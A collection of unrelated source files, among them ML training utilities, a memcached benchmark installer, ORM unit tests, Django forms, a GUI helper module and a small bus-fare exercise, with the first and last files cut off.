x_abs = K.abs(x)
x_bool = K.cast(K.less_equal(x_abs, 1.0), 'float32')
return lambda_cls_regr * K.sum(
y_true[:, :, :4 * num_classes] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(
epsilon + y_true[:, :, :4 * num_classes])
return class_loss_regr_fixed_num
def class_loss_cls(y_true, y_pred):
return lambda_cls_class * K.mean(categorical_crossentropy(y_true[0, :, :], y_pred[0, :, :]))
| 2,353 | 842 |
import os
import chainer
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
from chainer import Variable,cuda
import numpy as np
import chainer.functions as F
import losses
from chainer.training import extensions
import warnings
# assume [0,1] input
def postprocess(var):
img = var.data.get()
img = (img + 1.0) / 2.0 # [0, 1)
img = img.transpose(0, 2, 3, 1)
return img
class VisEvaluator(extensions.Evaluator):
name = "myval"
def __init__(self, *args, **kwargs):
params = kwargs.pop('params')
super(VisEvaluator, self).__init__(*args, **kwargs)
self.vis_out = params['vis_out']
self.slice = params['slice']
if self.slice:
self.num_s = len(self.slice)
else:
self.num_s = 1
self.count = 0
warnings.filterwarnings("ignore", category=UserWarning)
def evaluate(self):
batch_x = self._iterators['testA'].next()
batch_y = self._iterators['testB'].next()
models = self._targets
if self.eval_hook:
self.eval_hook(self)
fig = plt.figure(figsize=(9, 3 * self.num_s*(len(batch_x)+ len(batch_y))))
gs = gridspec.GridSpec( self.num_s*(len(batch_x)+ len(batch_y)), 3, wspace=0.1, hspace=0.1)
x = Variable(self.converter(batch_x, self.device))
y = Variable(self.converter(batch_y, self.device))
with chainer.using_config('train', False):
with chainer.function.no_backprop_mode():
if len(models)>2:
x_y = models['dec_y'](models['enc_x'](x))
#x_y_x = models['dec_x'](models['enc_x'](x)) ## X => Z => X
x_y_x = models['dec_x'](models['enc_y'](x_y)) ## X => Y => X
else:
x_y = models['gen_g'](x)
x_y_x = models['gen_f'](x_y)
# for i, var in enumerate([x, x_y]):
for i, var in enumerate([x, x_y, x_y_x]):
imgs = postprocess(var).astype(np.float32)
for j in range(len(imgs)):
if self.slice != None:
for k in self.slice:
ax = fig.add_subplot(gs[j*len(self.slice)+k,i])
ax.imshow(imgs[j,:,:,k], interpolation='none',cmap='gray',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
else:
ax = fig.add_subplot(gs[j,i])
ax.imshow(imgs[j], interpolation='none',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
with chainer.using_config('train', False):
with chainer.function.no_backprop_mode():
if len(models)>2:
y_x = models['dec_x'](models['enc_y'](y))
#y_x_y = models['dec_y'](models['enc_y'](y)) ## Y => Z => Y
y_x_y = models['dec_y'](models['enc_x'](y_x)) ## Y => X => Y
else: # (gen_g, gen_f)
y_x = models['gen_f'](y)
y_x_y = models['gen_g'](y_x)
# for i, var in enumerate([y, y_y]):
for i, var in enumerate([y, y_x, y_x_y]):
imgs = postprocess(var).astype(np.float32)
for j in range(len(imgs)):
if self.slice != None:
for k in self.slice:
ax = fig.add_subplot(gs[(j+len(batch_x))*len(self.slice)+k,i])
ax.imshow(imgs[j,:,:,k], interpolation='none',cmap='gray',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
else:
ax = fig.add_subplot(gs[j+len(batch_x),i])
ax.imshow(imgs[j], interpolation='none',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
gs.tight_layout(fig)
plt.savefig(os.path.join(self.vis_out,'count{:0>4}.jpg'.format(self.count)), dpi=200)
self.count += 1
plt.close()
cycle_y_l1 = F.mean_absolute_error(y,y_x_y)
# cycle_y_l2 = F.mean_squared_error(y,y_x_y)
cycle_x_l1 = F.mean_absolute_error(x,x_y_x)
# id_xy_grad = losses.loss_grad(x,x_y)
result = {"myval/cycle_y_l1":cycle_y_l1, "myval/cycle_x_l1":cycle_x_l1}
return result
## obsolete
def visualize(models,test_image_folder, test_A_iter, test_B_iter):
@chainer.training.make_extension()
def visualization(trainer):
updater = trainer.updater
return visualization
| 4,597 | 1,613 |
VERSION = "2.50.0"
| 19 | 14 |
import argparse
import os.path
import functools
import numpy as np
from pyspark.mllib.linalg import SparseVector
from pyspark import SparkContext, SparkConf
import text_helpers
#TODO: implement
def getHashFunctions(n=200):
""" generates n number of hash functions
"""
pass
#TODO: implement
def getStopWords():
""" returns a list of stop words
"""
#TODO: use NLTK to get a list of stopwords
pass
#TODO: implement
def minHash(text, hash):
""" Returns min hash value of all hashes for a given text
Args:
data (RDD)
hash (function)
Returns:
int: min hash value for entire data set
"""
pass
def run(fileName, n_hashes, n_buckets):
""" Starts the main LSH process.
Args:
fileName (string): path of text file to read
n_hashes (int): number of hash functions to generate
n_buckets (int): number of buckets to use
Returns:
Vector: buckets of minhash values
"""
sc = SparkContext(conf = SparkConf())
hashes = sc.broacast(getHashFunctions(n_hashes))
text = sc.textFile(fileName)
stopWords = sc.textFile('path/to/stopwords') # Test
cleanData = text.map(removePunctuation).subtract(stopWords).cache()
#TODO: convert to n-grams
#TODO: get min-hash values -> total of n_hashes runs. Implement using a
# partial function from functools
#TODO: return a vector representing buckets of minhash values
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Spark LSH',
epilog = 'LSH', add_help = 'How to use',
prog = 'python spark-driver.py <arguments>')
parser.add_argument("-i", "--input", required = True,
help = "Input directory of text files.")
# Optional parameters.
parser.add_argument("-h", "--hashes", type = int, default = 200,
help = "Number of hash functions to use. [DEFAULT: 200]")
parser.add_argument("-b", "--buckets", type = int, default = 1000,
help = "Number of buckets to use. [DEFAULT: 1000]")
args = vars(parser.parse_args())
n_hashes,n_buckets = args['hashes'], args['buckets']
baseDir = os.path.join(args['input'])
inputPath = os.path.join('<path/to/document>') # Test
fileName = os.path.join(baseDir, inputPath)
run(fileName, n_hashes, n_buckets)
| 2,336 | 760 |
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing memcached server installation and cleanup functions."""
import logging
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import INSTALL_DIR
FLAGS = flags.FLAGS
DOWNLOAD_URL = 'http://memcached.org/files/memcached-1.4.33.tar.gz'
MEMCACHED_DIR_NAME = 'memcached'
MEMCACHED_DIR = '%s/%s' % (INSTALL_DIR, MEMCACHED_DIR_NAME)
MEMCACHED_PORT = 11211
flags.DEFINE_integer('memcached_size_mb', 64,
'Size of memcached cache in megabytes.')
def _Install(vm):
"""Installs the memcached server on the VM."""
vm.Install('build_tools')
vm.Install('event')
vm.RemoteCommand('cd {0} && wget {1} -O memcached.tar.gz'.format(
INSTALL_DIR, DOWNLOAD_URL))
out, _ = vm.RemoteCommand('cd %s && tar -xzvf memcached.tar.gz' % INSTALL_DIR)
# The directory name should be the first line of stdout
memcached_dir = out.split('\n', 1)[0]
# Rename the directory to a standard name
vm.RemoteCommand('cd {0} && mv {1} {2}'.format(
INSTALL_DIR, memcached_dir, MEMCACHED_DIR_NAME))
# Make memcached
vm.RemoteCommand('cd {0} && ./configure && make'.format(MEMCACHED_DIR))
def YumInstall(vm):
"""Installs the memcache package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the memcache package on the VM."""
_Install(vm)
@vm_util.Retry(poll_interval=5, timeout=300,
retryable_exceptions=(errors.Resource.RetryableCreationError))
def _WaitForServerUp(server):
"""Block until the memcached server is up and responsive.
Will timeout after 5 minutes, and raise an exception. Before the timeout
expires any exceptions are caught and the status check is retried.
We check the status of the server by issuing a 'stats' command. This should
return many lines of form 'STAT <name> <value>\\r\\n' if the server is up and
running.
Args:
server: VirtualMachine memcached has been installed on.
Raises:
errors.Resource.RetryableCreationError when response is not as expected or
if there is an error connecting to the port or otherwise running the
remote check command.
"""
address = server.internal_ip
port = MEMCACHED_PORT
logging.info("Trying to connect to memcached at %s:%s", address, port)
try:
out, _ = server.RemoteCommand(
'(echo -e "stats\n" ; sleep 1)| netcat %s %s' % (address, port))
if out.startswith('STAT '):
logging.info("memcached server stats received. Server up and running.")
return
except errors.VirtualMachine.RemoteCommandError as e:
raise errors.Resource.RetryableCreationError(
"memcached server not up yet: %s." % str(e))
else:
raise errors.Resource.RetryableCreationError(
"memcached server not up yet. Expected 'STAT' but got '%s'." % out)
def ConfigureAndStart(server):
"""Prepare the memcached server on a VM.
Args:
server: VirtualMachine to install and start memcached on.
"""
server.Install('memcached_server')
for scratch_disk in server.scratch_disks:
server.RemoteCommand('sudo umount %s' % scratch_disk.mount_point)
server.RemoteCommand('cd {mcdir}; ./memcached -m {size} '
'&> /dev/null &'.format(
mcdir=MEMCACHED_DIR, size=FLAGS.memcached_size_mb))
_WaitForServerUp(server)
logging.info("memcached server configured and started.")
def StopMemcached(server):
out, _ = server.RemoteCommand(
'(echo -e "quit\n" ; sleep 1)| netcat %s %s' %
(server.internal_ip, MEMCACHED_PORT))
def FlushMemcachedServer(ip, port):
vm_util.IssueCommand(
'(echo -e "flush_all\n" ; sleep 1)| netcat %s %s' % (ip, port))
def Uninstall(vm):
vm.RemoteCommand('pkill memcached')
vm.RemoteCommand('rm -rf %s' % MEMCACHED_DIR)
| 4,469 | 1,492 |
# Testing our tests!!
from asyncpgsa.testing import MockPG
async def test_use_fetchrow():
pg = MockPG()
pg.set_database_results({'sqrt': 3})
result = await pg.fetchrow('SELECT * FROM sqrt(16);')
assert result['sqrt'] == 3
async def test_use_fetchval():
pg = MockPG()
pg.set_database_results(3)
result = await pg.fetchval('SELECT * FROM sqrt(16);')
assert result == 3
async def test_use_fetch():
pg = MockPG()
pg.set_database_results([{'sqrt': 3}])
result = await pg.fetch('SELECT * FROM sqrt(16);')
assert result[0]['sqrt'] == 3
| 582 | 207 |
import NORM
import NORM.utils
import psycopg2
import unittest
import logging
logging.basicConfig(level = logging.WARN)
class Person(NORM.DBObject):
TABLE = 'people'
FIELDS = ['firstname','surname','age']
class FakeCursor(object):
def __init__(self, conn):
self.conn = conn
def execute(self, sql, args = []):
logging.info("%s: %s", sql, args)
self.conn.append(sql, args)
self.sql = sql
self.args = args
def fetchone(self):
if self.sql.lower().startswith('select'):
if len(self.args) == 0 or self.args[0] == 1:
return {'firstname': 'joe','surname':'bloggs','age':27,'id':1}
else:
return {'firstname': 'jason','surname':'connery','age':52,'id':2}
elif self.sql.lower().startswith('insert'):
return {'newid': 2}
def __iter__(self):
yield self.fetchone()
def close(self):
pass
class FakeConnection(object):
def __init__(self):
self.statements = []
def cursor(self, cursor_factory = None):
return FakeCursor(self)
def append(self, sql, args):
self.statements.append( (sql, args) )
class NormTest(unittest.TestCase):
def setUp(self):
self.conn = FakeConnection()
#self.conn = psycopg2.connect('dbname=normtest')
def testDelete(self):
person = Person(self.conn, 2)
person.delete()
self.assertEquals(
self.conn.statements[-1],
('delete from people where id = %s', [2])
)
def testLoad(self):
person = Person(self.conn, 1)
self.assertEquals(person['firstname'], 'joe')
self.assertEquals(person['surname'], 'bloggs')
self.assertEquals(person['age'], 27)
self.assertEquals(person['id'], 1)
if hasattr(self.conn, 'statements'):
self.assertEquals(
self.conn.statements[-1],
('select * from people where id = %s', [1])
)
def testLimit(self):
people = Person.select_all(self.conn, _limit = 10)
self.assertIn(' LIMIT 10', self.conn.statements[-1][0])
person = Person.select_all(self.conn, _limit = (10, 10))
self.assertIn(' LIMIT 10 OFFSET 10', self.conn.statements[-1][0])
def testSelect(self):
people = Person.select_all(self.conn)
self.assertEquals(len(people), 1)
if hasattr(self.conn, 'statements'):
self.assertEquals(
self.conn.statements[-1],
('select * from people', [])
)
def testUpdate(self):
person = Person(self.conn, 1)
person['age'] = 28
person.store()
if hasattr(self.conn, 'statements'):
sql, args = self.conn.statements[-1]
self.assertIn('age = %(age)s', sql)
self.assertIn('firstname = %(firstname)s', sql)
self.assertIn('surname = %(surname)s', sql)
self.assertEquals(args,
{'firstname': 'joe','surname':'bloggs','age':28,'id':1}
)
def testCreate(self):
person = Person(self.conn)
person.update({
'firstname': 'jason',
'surname':'connery',
'age':52,
})
person.store()
if hasattr(self.conn, 'statements'):
sql, args = self.conn.statements[-1]
self.assertRegexpMatches(sql, '^insert into people')
self.assertIn('age', sql)
self.assertIn('firstname', sql)
self.assertIn('surname', sql)
self.assertIn('%(age)s', sql)
self.assertIn('%(firstname)s', sql)
self.assertIn('%(surname)s', sql)
self.assertIn('returning id as newid', sql)
self.assertEquals(args, {
'firstname': 'jason',
'surname': 'connery',
'age': 52,
'id': None,
})
self.assertEquals(person['id'], 2)
class UtilsTest(unittest.TestCase):
def testEncodeWhere(self):
wherestr, args = NORM.utils.encode_where({'age': 20})
self.assertEquals(wherestr, 'age = %(age)s')
self.assertIn('age', args)
self.assertEquals(args['age'], 20)
def testEncodeWhereCmp(self):
wherestr, args = NORM.utils.encode_where({'age' : ('>', 20)})
self.assertEquals(wherestr, 'age > %(age)s')
self.assertIn( 'age',args)
self.assertEquals(args['age'], 20)
unittest.main()
| 3,784 | 1,596 |
import os
import torch
import numpy as np
import torchvision.utils as vutils
from tensorboardX import SummaryWriter
from datetime import datetime
from utils.helpers import get_learning_rate
class TensorboardLogger:
def __init__(self, log_every=10, log_params=False, log_dir=None, log_images=False, log_grads=False, **kwargs):
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
self.log_dir = os.path.join(log_dir, "runs", current_time)
self.writer = SummaryWriter(log_dir=self.log_dir)
self.counters = {"evaluate": 0, "train": 0, "test": 0}
self.epochs = {"evaluate": 0, "train": 0, "test": 0}
self.log_every = log_every
self.log_params = log_params if isinstance(log_params, bool) else False
self.log_images = log_images if isinstance(log_images, bool) else False
self.log_grads = log_grads if isinstance(log_grads, bool) else False
print(f"Logger: Log parameters={log_params}, Log gradients={log_grads}")
# def state_dict(self):
# state = {}
# state['counters'] = self.counters
# state['epochs'] = self.epochs
# return {'state': state}
def fast_forward(self, last_epoch=0, step_per_epoch=0):
step = (last_epoch+1)*step_per_epoch
self.counters = {"evaluate": step, "train": step, "test": step}
self.epochs = {"evaluate": last_epoch+1, "train": last_epoch+1, "test": last_epoch+1}
def teardown(self):
self.writer.export_scalars_to_json(os.path.join(self.log_dir, "all_scalars.json"))
self.writer.close()
def add_embedding(self, features, images, phase="train", stage="epoch"):
step = self.epochs[phase] if stage == "epoch" else self.counters[phase]
self.writer.add_embedding(features, label_img=images, global_step=step)
def _plot_metrics(self, metrics, phase, step):
for m_name, m_val in metrics.items():
self.writer.add_scalar("{}/{}".format(phase, m_name), m_val, step)
def log_gradients(self, tag, model, phase="train", log_every=1000):
if (self.log_grads is True) and (self.counters[phase] % log_every == 0):
for name, param in model.named_parameters():
if param.grad is not None:
self.writer.add_histogram("{}_{}".format(tag, name), param.grad.data.cpu().numpy(), self.counters[phase])
def log_preactivations(self, module, phase="train"):
classname = module.__class__.__name__
def _log_preactivations(input, output):
self.writer.add_histogram("{}_{}".format(classname, "forward"), output.data.cpu().numpy(), self.counters[phase])
if classname.find('Conv') != -1 or classname.find('Linear') != -1:
module.register_forward_hook(_log_preactivations)
def log_image_grid(self, name, images, phase="train", normalize=True):
if self.log_images is True:
x_rg = vutils.make_grid(images, normalize=normalize, scale_each=True)
self.writer.add_image(name, x_rg, self.counters[phase])
# Method Missing - automatically assume it is for the summaryWriter
def __getattr__(self, method_name):
log_fn = getattr(self.writer, method_name, None)
if log_fn:
return log_fn
else:
raise AttributeError(method_name)
def log_iteration(self, engine, phase="train", models=None, optims=None):
# other_metrics = {}
if optims:
for name, optim in optims.items():
lr = get_learning_rate(optim)[0]
self.writer.add_scalar("{}/{}_lr".format(phase, name), lr, self.counters[phase])
if self.counters[phase] % self.log_every == 0:
self._plot_metrics(engine.state.metrics, phase, self.counters[phase])
# self._plot_metrics(other_metrics, phase, self.counters[phase])
self.counters[phase] += 1
def log_epoch(self, engine, phase="train", models=None, optims=None):
self._plot_metrics(engine.state.metrics, phase, self.counters[phase])
if phase == "train" and self.log_params is True:
for m_name, model in models.items():
for name, param in model.named_parameters():
self.writer.add_histogram("{}_{}".format(m_name, name), param.data.cpu().numpy(), self.epochs[phase])
if phase == "evaluate":
self.epochs[phase] += 1
else:
self.epochs[phase] = engine.state.epoch | 4,012 | 1,567 |
# WRITE YOUR CODE SOLUTION HERE
from datetime import datetime, timedelta, date
#Get todays date and store it in a variable 'date'
date = datetime.now()
"""
# Use todays date to get the name on the day of the week written in a short
# form with the first letter capitalized (e.g) 'Fri' if today were Friday and
# assigns it a variable 'day'
"""
day = datetime.date(date).strftime('%a')
"""
Uses if Statement to determine the todays fare following these bus fare shedule:
Monday - Friday --> 100
Saturdat --> 60
Sunday --> 80
Prints the results in this exact formart
Date: 2021-01-05
Day:Tue
Fare:100
"""
if day == "Mon" or day == "Tue" or day == "Wen" or day =="Thu" or day == "Fri":
fare = 100
elif day == "Sat":
fare = 60
else:
fare = 80
print("Date:", date.date())
print("Day:" + day)
print("Fare:", fare)
| 870 | 325 |
from django.db.models.base import Model
from django.forms import ModelForm, widgets
from django import forms
from login.models import User, Task, Submissions, Subject
class DateTimeInput(forms.DateTimeInput):
input_type = 'datetime-local'
input_value = ""
class AddTaskForm(ModelForm):
class Meta:
model = Task
fields = ['Name', 'Description', 'deadline']
widgets = {
'deadline' : DateTimeInput(),
}
class GraderForm(ModelForm):
class Meta:
model = Submissions
fields = ['comment', 'nilai'] | 572 | 163 |
import PySimpleGUI as sg
def webexPollBuilderGUI(t):
return sg.Window("Webex Poll Builder").Layout(
[[sg.Text("How long should the question last for?"),
sg.Combo(t)],
[sg.Text("Select the file with the question and answers.")],
[sg.In(), sg.FileBrowse()],
[sg.Text("Select the directory to save output file to.")],
[sg.In(), sg.FolderBrowse()],
[sg.Text("Enter filename. (Default is date)")],
[sg.In()],
[sg.CloseButton("OK"), sg.CloseButton("Cancel")]]
).Read()
def timeNotSelected():
sg.popup("Please select a time from the drop-down menu.",
title="Time Not Selected")
def invalidTime(t):
sg.popup("Invalid time: " + str(t),
"Please select a time from the drop-down menu.",
title="Invalid Time")
def inFileNotSelected():
sg.popup("Please select a valid input (.txt) file.",
title="Input File Not Selected")
def invalidInFile(f):
sg.popup("Invalid input file: {0}".format(f),
"Please select a valid input (.txt) file.",
title="Invalid Input File")
def outDirNotSelected():
sg.popup("Please select a valid output directory.",
title="Output Directory Not Selected")
def invalidOutDir(d):
sg.popup("Invalid Output Directory: {0}".format(d),
"Please select a valid output directory.",
title="Invalid Output Directory")
def invalidOutFilename(f):
sg.popup("Invalid Output Filename: {0}".format(f),
"Please enter a valid file name (or leave the field blank).",
title="Invalid Output Filename")
def noCorrectAnswer():
sg.popup("There must be at least one correct answer.",
title="No Correct Answer(s)")
def invalidFileFormat(e, g):
sg.popup("".join(["Expected ", e, ", got ", g, "."]),
title="Invalid File Format")
def invalidAnswerFormat(s):
invalidFileFormat("'T' or 'F' at beginning of answer", "'" + s + "'")
def noQuestion():
invalidFileFormat("question", "a blank line")
def noBlankLineAfterQuestion(s):
invalidFileFormat("a blank line after question", "'" + s + "'")
| 2,200 | 658 |
import numpy as np
import networkx as nx
from copy import deepcopy
from spira.core.parameters.variables import GraphParameter, StringParameter
from spira.core.parameters.descriptor import Parameter, RestrictedParameter
from spira.yevon.geometry.coord import Coord
from spira.yevon.vmodel.geometry import GeometryParameter
from spira.yevon.geometry.ports.base import __Port__
from spira.core.parameters.restrictions import RestrictType
from spira.yevon.process import get_rule_deck
RDD = get_rule_deck()
__all__ = ['Net', 'NetParameter']
ELM_TYPE = {1: 'line', 2: 'triangle'}
from spira.core.transformable import Transformable
from spira.core.parameters.initializer import ParameterInitializer
class __Net__(Transformable, ParameterInitializer):
""" """
@property
def count(self):
return nx.number_of_nodes(self.g)
class Net(__Net__):
"""
Constructs a graph from the physical geometry
generated from the list of elements.
"""
# g = GraphParameter()
g = Parameter()
mesh_data = Parameter(fdef_name='create_mesh_data')
geometry = GeometryParameter(allow_none=True, default=None)
branch_nodes = Parameter(fdef_name='create_branch_nodes')
lines = Parameter(fdef_name='create_lines')
triangles = Parameter(fdef_name='create_triangles')
physical_triangles = Parameter(fdef_name='create_physical_triangles')
physical_lines = Parameter(fdef_name='create_physical_lines')
name = StringParameter(default='no_name')
def __init__(self, **kwargs):
super().__init__(**kwargs)
if 'g' in kwargs:
self.g = kwargs['g']
else:
self.g = nx.Graph()
self._generate_mesh_graph()
def __repr__(self):
if self.geometry is None:
class_string = "[SPiRA: Net] (name \'{}\', nodes {})"
return class_string.format(self.name, self.count)
else:
class_string = "[SPiRA: Net] (name \'{}\', nodes {}, geometry {})"
return class_string.format(self.name, self.count, self.geometry.process.symbol)
def __str__(self):
return self.__repr__()
def _generate_mesh_graph(self):
""" Create a graph from the meshed geometry. """
ll = len(self.mesh_data.points)
A = np.zeros((ll, ll), dtype=np.int64)
for n, triangle in enumerate(self.triangles):
self._add_edges(n, triangle, A)
for n, triangle in enumerate(self.triangles):
self._add_positions(n, triangle)
def _add_edges(self, n, tri, A):
def update_adj(self, t1, adj_mat, v_pair):
if (adj_mat[v_pair[0]][v_pair[1]] != 0):
t2 = adj_mat[v_pair[0]][v_pair[1]] - 1
self.g.add_edge(t1, t2, label=None)
else:
adj_mat[v_pair[0]][v_pair[1]] = t1 + 1
adj_mat[v_pair[1]][v_pair[0]] = t1 + 1
v1 = [tri[0], tri[1], tri[2]]
v2 = [tri[1], tri[2], tri[0]]
for v_pair in list(zip(v1, v2)):
update_adj(self, n, A, v_pair)
def _add_positions(self, n, triangle):
from spira import settings
pp = self.mesh_data.points
grids_per_unit = settings.get_grids_per_unit()
n1, n2, n3 = pp[triangle[0]], pp[triangle[1]], pp[triangle[2]]
x = (n1[0] + n2[0] + n3[0]) / 3
y = (n1[1] + n2[1] + n3[1]) / 3
x = x * grids_per_unit
y = y * grids_per_unit
self.g.node[n]['vertex'] = triangle
self.g.node[n]['position'] = Coord(x, y)
self.g.node[n]['display'] = RDD.DISPLAY.STYLE_SET[RDD.PLAYER.METAL]
def create_mesh_data(self):
return self.geometry.mesh_data
def add_new_node(self, n, D, polygon, position, display):
num = self.g.number_of_nodes()
self.g.add_node(num+1, position=position, device_reference=D, process_polygon=polygon, display=display)
self.g.add_edge(n, num+1)
def create_triangles(self):
if 'triangle' not in self.mesh_data.cells:
raise ValueError('Triangle not found in cells')
return self.mesh_data.cells['triangle']
def create_lines(self):
if 'line' not in self.mesh_data.cells:
raise ValueError('Line not found in cells')
return self.mesh_data.cells['line']
def create_physical_triangles(self):
if 'triangle' not in self.mesh_data.cell_data:
raise ValueError('Triangle not in meshio cell_data')
if 'gmsh:physical' not in self.mesh_data.cell_data['triangle']:
raise ValueError('Physical not found in meshio triangle')
return self.mesh_data.cell_data['triangle']['gmsh:physical'].tolist()
def create_physical_lines(self):
if 'line' not in self.mesh_data.cell_data:
raise ValueError('Line not in meshio cell_data')
if 'gmsh:physical' not in self.mesh_data.cell_data['line']:
raise ValueError('Physical not found in meshio triangle')
return self.mesh_data.cell_data['line']['gmsh:physical'].tolist()
def process_triangles(self):
"""
Arguments
---------
tri : list
The surface_id of the triangle
corresponding to the index value.
name -> 5_0_1 (layer_datatype_polyid)
value -> [1 2] (1=surface_id 2=triangle)
"""
triangles = {}
for name, value in self.mesh_data.field_data.items():
for n in self.g.nodes():
surface_id = value[0]
if self.physical_triangles[n] == surface_id:
layer = int(name.split('_')[0])
datatype = int(name.split('_')[1])
key = (layer, datatype)
if key in triangles:
triangles[key].append(n)
else:
triangles[key] = [n]
return triangles
def process_lines(self):
"""
Arguments
---------
tri : list
The surface_id of the triangle
corresponding to the index value.
name -> 5_0_1 (layer_datatype_polyid)
value -> [1 2] (1=surface_id 2=triangle)
"""
lines = {}
for name, value in self.mesh_data.field_data.items():
# print(name, value)
# print(self.physical_lines)
for n in self.physical_lines:
line_id = value[0]
if n == line_id:
# print(name)
# print(value)
# print('')
polygon_string = name.split('*')[0]
polygon_hash = name.split('*')[1]
polygon_uid = int(name.split('*')[2])
key = (polygon_string, polygon_hash, polygon_uid)
if key in lines:
lines[key].append(n)
else:
lines[key] = [n]
return lines
def get_triangles_connected_to_line(self):
"""
Labeling of an edge line:
polygon_uid_i [line elm_type]
[SPiRA: Polygon 'M5']_17_0 [2 1]
Labeling of triangle:
layer datatype [triangle elm_type]
50_1_0_0 [1 2]
"""
# lines = []
# for v in self.process_lines().values():
# lines.extend(v)
# print(lines)
# triangles = {}
# for n in nodes:
# for node, triangle in enumerate(self.triangles):
# if n == node:
# triangles[n] = triangle
# return triangles
def triangle_nodes(self):
""" Get triangle field_data in list form. """
nodes = []
for v in self.process_triangles().values():
nodes.extend(v)
triangles = {}
for n in nodes:
for node, triangle in enumerate(self.triangles):
if n == node:
triangles[n] = triangle
return triangles
def transform(self, transformation):
for n in self.g.nodes():
self.g.node[n]['position'] = transformation.apply_to_coord(self.g.node[n]['position'])
return self
def create_branch_nodes(self):
""" Nodes that defines different conducting branches. """
from spira.yevon.gdsii.sref import SRef
from spira.yevon.geometry.ports import Port
branch_nodes = list()
for n in self.g.nodes():
if 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
if isinstance(D, SRef):
branch_nodes.append(n)
if isinstance(D, Port):
branch_nodes.append(n)
return branch_nodes
def st_nodes(self):
""" Nodes that defines different conducting branches.
All nodes are ports. Chek port purposes.
"""
from spira.yevon.gdsii.sref import SRef
from spira.yevon.geometry.ports import Port
branch_nodes = list()
for n in self.g.nodes():
if 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
P = self.g.node[n]['process_polygon']
# FIXME: Maybe implement node operators (__and__, etc)
# if (D.purpose.symbol == 'B') and (P.layer.purpose.symbol == 'DEVICE_METAL'):
# branch_nodes.append(n)
if D.purpose.symbol == 'C':
branch_nodes.append(n)
elif D.purpose.symbol == 'D':
branch_nodes.append(n)
# elif D.purpose.symbol == 'P':
# branch_nodes.append(n)
elif D.purpose.symbol == 'T':
branch_nodes.append(n)
# elif (D.purpose.symbol == 'P') and (D.name[1] != 'E'):
# branch_nodes.append(n)
return branch_nodes
def convert_to_branch_node(self, n, uid):
pass
def del_branch_attrs(self):
""" Reset the branch attrs for new branch node creation. """
for n in self.g.nodes():
if 'branch_node' in self.g.node[n]:
del self.g.node[n]['branch_node']
return self
def convert_pins(self):
""" Remove pin node attrs with more than 1 edge connected to it. """
for n in self.g.nodes():
if 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
if D.purpose.symbol == 'P':
if len(self.g.edges(n)) > 0:
del self.g.node[n]['device_reference']
return self
def convert_device(self):
""" Convert a device metal node to a dummy port.
Has to be connected to atleast 1 PEdge node. """
from spira.yevon.geometry.ports import Port
for n in self.g.nodes():
convert = False
P = self.g.node[n]['process_polygon']
if P.layer.purpose.symbol == 'DEVICE_METAL':
for i in self.g.neighbors(n):
if 'device_reference' in self.g.node[i]:
D = self.g.node[i]['device_reference']
# print(D)
if D.purpose.symbol == 'P':
convert = True
if convert is True:
port = Port(
name='Djj{}'.format(n),
midpoint=P.center,
process=P.layer.process,
)
self.g.node[n]['device_reference'] = port
return self
def remove_nodes(self):
"""
Nodes to be removed:
1. Are not a branch node.
2. Are not a device node.
3. Branch nodes must equal the branch id.
"""
from spira.yevon.gdsii.sref import SRef
from spira.yevon.geometry.ports import Port
locked_nodes = []
remove_nodes = []
for n in self.g.nodes():
if 'branch_node' in self.g.node[n]:
D = self.g.node[n]['branch_node']
if isinstance(D, Port):
locked_nodes.append(n)
elif 'device_reference' in self.g.node[n]:
D = self.g.node[n]['device_reference']
if isinstance(D, (Port, SRef)):
locked_nodes.append(n)
for n in self.g.nodes():
if n not in locked_nodes:
remove_nodes.append(n)
self.g.remove_nodes_from(remove_nodes)
def NetParameter(local_name=None, restriction=None, **kwargs):
R = RestrictType(Net) & restriction
return RestrictedParameter(local_name, restriction=R, **kwargs)
| 12,740 | 3,900 |
"""
Runs list_files on the current directory (".")
"""
from util import list_files
def main() -> None:
path = "."
files = list_files(path)
for f in files:
print(
"d" if f.isdir else "f",
f" {f.human_readable_bytes:<12}",
f.path
)
if __name__ == "__main__":
main()
| 337 | 120 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 13 09:23:51 2017
@author: philipp
"""
# Analyze count distribution
# =======================================================================
# Imports
from __future__ import division # floating point division by default
import sys
import yaml
import os
import glob
import pandas
import scipy.stats.mstats as sc
import numpy
import time
def Normalization():
# ------------------------------------------------
# Print header
# ------------------------------------------------
print('++++++++++++++++++++++++++++++++++++++++++++++++')
start = time.time()
# ------------------------------------------------
# Get parameters
# ------------------------------------------------
configFile = open('configuration.yaml','r')
config = yaml.safe_load(configFile)
configFile.close()
ScriptsDir = config['ScriptsDir']
sgRNAReadCountDir = config['sgRNAReadCountDir']
GeneReadCountDir = config['GeneReadCountDir']
delta = config['delta']
norm = config['Normalization']
RoundCount = config['RoundCount']
NormSuffix = '_normalized.txt'
N0 = 1000000
eps = 0.001
# ------------------------------------------------
# Get files
# ------------------------------------------------
os.chdir(sgRNAReadCountDir)
FileNames_u = glob.glob('*_GuideCounts.txt')
colnames_u = ['sgRNA','gene','counts']
os.chdir(GeneReadCountDir)
FileNames_g = glob.glob('*_GeneCounts.txt')
colnames_g = ['gene','counts']
# ------------------------------------------------
# Normalization to counts per million
# ------------------------------------------------
if norm == 'cpm':
print('Normalizing to counts per million reads ...')
# sgRNA counts
